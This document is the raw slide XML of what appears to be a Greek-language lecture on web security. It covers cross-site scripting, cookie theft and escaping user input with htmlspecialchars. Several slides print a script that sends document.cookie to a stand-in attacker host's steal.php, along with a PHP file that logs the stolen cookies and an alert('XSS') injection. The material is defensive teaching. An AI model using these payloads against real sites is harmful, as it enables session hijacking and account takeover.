              <a:t> τον υπολογιστή μας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μία επίσκεψη δεν αρκεί για να κάνει κακό σ’ εμάς</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Το χειρότερο που συμβαίνει είναι να μας κάνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RickRoll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκτός αν το επιτρέψουμε εμείς κατεβάζοντας κάποιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πρόγραμμα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκεί διαφέρουν οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εφαρμογές από τις </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>desktop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web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μοντέλο είναι ένα ασφαλέστερο μοντέλο</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν απαιτείται εμπιστοσύνη για να «τρέξουμε» μία </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εφαρμογή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l-GR" dirty="0" smtClean="0"/>
              <a:t>σελίδες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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>kokkinoskoufitsa.gr</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>που ανήκει στον «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>καλό»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που ανήκει στον «κακό»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Ως διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>το επισκέπτομαι</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τα μπισκότα μου μού δίνουν πρόσβαση διαχειριστή</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Στη συνέχεια επισκέπτομαι το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χωρίς να γνωρίζω τι είναι</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αυτό δεν θα πρέπει να επιτρέψει στον προγραμματιστή του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να αποκτήσει πρόσβαση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επιπέδου διαχειριστή στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17394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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: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/>
              <a:t>Επιστρέφει τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>της σελίδας όπου </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>τρέχει</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήσιμο π.χ. για να βρούμε το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>του χρήστη που έχει κάνει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήσιμο επίσης για να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>θέσουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χωρίς να είναι απαραίτητη η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Αρκεί λίγη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για να κάνει το κακό...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Έστω ότι ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kakoslykos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> καταφέρνει να τρέξει το ακόλουθο στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr: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&lt;script type=“text/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img.src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 ‘http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://kakoslykos.gr/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steal.php?cookie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=‘ +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document.cookie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document.appendChild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299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Ενώ στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>steal.php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n-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχει: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file_put_contents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haha.txt”, $_GET[ ‘cookie’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&gt;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Τρόπος επίθεσης:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kakoslykos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«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εισάγει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>» τον κώδικα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smtClean="0"/>
              <a:t>kokkinoskoyfitsa.gr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και περιμένει</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kokkinoskoyfitsa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l-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>επισκέπτεται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> τη σελίδα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoyfitsa.gr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο «κακός» κώδικας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b="1" dirty="0" smtClean="0"/>
              <a:t>τρέχει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> στον υπολογιστή του «καλού» διαχειριστή χωρίς να το γνωρίζει</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τα μπισκότα του «καλού» διαχειριστή </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>στέλνονται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> μέσω</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>στη σελίδα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκεί </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>καταγράφονται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> σε αρχείο, και ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kakoslykos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχει πλέον πρόσβαση διαχειριστή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Πώς εισάγεται όμως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κώδικας;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σημεία όπου εκτυπώνεται είσοδος χρήστη χωρίς έλεγχο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echo “Welcome, “ . $_GET[ ‘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user’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Υπό κανονικές συνθήκες...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dionyziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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dionyziz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7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Χωρίς </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ένας ενδιάμεσος μπορεί</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Να διαβάσει τα δεδομένα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>α αλλάξει τα δεδομένα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>«Ενδιάμεσος» μπορεί να είναι:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ο</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάποιος που έχει στήσει ένα «ελεύθερο» ασύρματο δίκτυο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l-GR" b="1" dirty="0"/>
              <a:t>παράδειγμα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean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14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Τι γίνεται όμως αν...</a:t>
            </a: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l-GR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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diony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ziz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77882" y="2996952"/>
            <a:ext cx="380124" cy="4741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58006" y="347110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Συντακτικό σφάλμα!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2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l-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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&lt;strong&gt;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n-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;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diony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&lt;strong&gt;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ziz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&lt;/strong&gt;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2933305"/>
            <a:ext cx="380124" cy="4741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58006" y="347110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Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>υπάρχει συντακτικό σφάλμα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Ουσιαστικά κάναμε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Παρόμοια με το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχουμε πλήρη έλεγχο του κώδικα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068960"/>
            <a:ext cx="8229600" cy="35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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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”&gt;alert( ‘XSS’ );&lt;/script&gt;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l-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;alert( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz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Αλλάζοντας τα περιεχόμενα του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχουμε πλέον απόλυτο έλεγχο στο τι θα εκτελεστεί σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που δεν είναι δικό μας...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068960"/>
            <a:ext cx="8229600" cy="35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script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF000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img.src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‘http://kakoslykos.gr/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steal.php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+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document.cookie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document.appendChild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8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στον υπολογιστή μας τρέχουμε ό,τι θέλουμε σε οποιαδήποτε σελίδα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Το ενδιαφέρον είναι να κάνουμε να τρέξει κάποιος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>άλλος</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>την </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>μας </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>στην ξένη σελίδα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κατά προτίμηση κάποιος διαχειριστής</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αυτό μπορεί να επιτεχθεί αν καταφέρουμε να αποθηκεύσουμε μόνιμα την «κακή» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. ως μέρος ενός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παράδειγμα)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275348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55" y="1412776"/>
            <a:ext cx="8229600" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πρέπει να φιλτράρουμε τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μας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416" y="184482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Αποφυγή όλων των χαρακτήρων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;, &amp;, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR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$username = $_GET[ ‘username’ ];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$username, “&lt;”  ) !== false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$username, “&gt;” ) !== false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$username, ‘”’  ) !== false ) {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die( “You’re not welcome here.” );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55" y="1412776"/>
            <a:ext cx="8229600" cy="5184576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αν όμως θέλουμε να επιτρέπουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt;, &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. κάποιος μπορεί να θέλει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" i="1" dirty="0" smtClean="0"/>
              <a:t>όντως</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> να γράψει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που να εμφανίζεται αυτούσια</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάνουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>τους χαρακτήρες μας</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>entities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smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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lt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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     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gt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dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     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&amp;amp;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“ </a:t>
            </a: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quot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0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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Αντικαθιστά τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>entities</a:t>
            </a:r>
          </a:p>
          <a:p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$username = $_GET[ ‘username’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“Welcome, “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.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htmlspecialchars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56792"/>
            <a:ext cx="8229600" cy="50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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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”&gt;alert( ‘XSS’ );&lt;/script&gt;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l-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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</a:rPr>
              <a:t>diony&amp;lt;script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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text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javascript&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
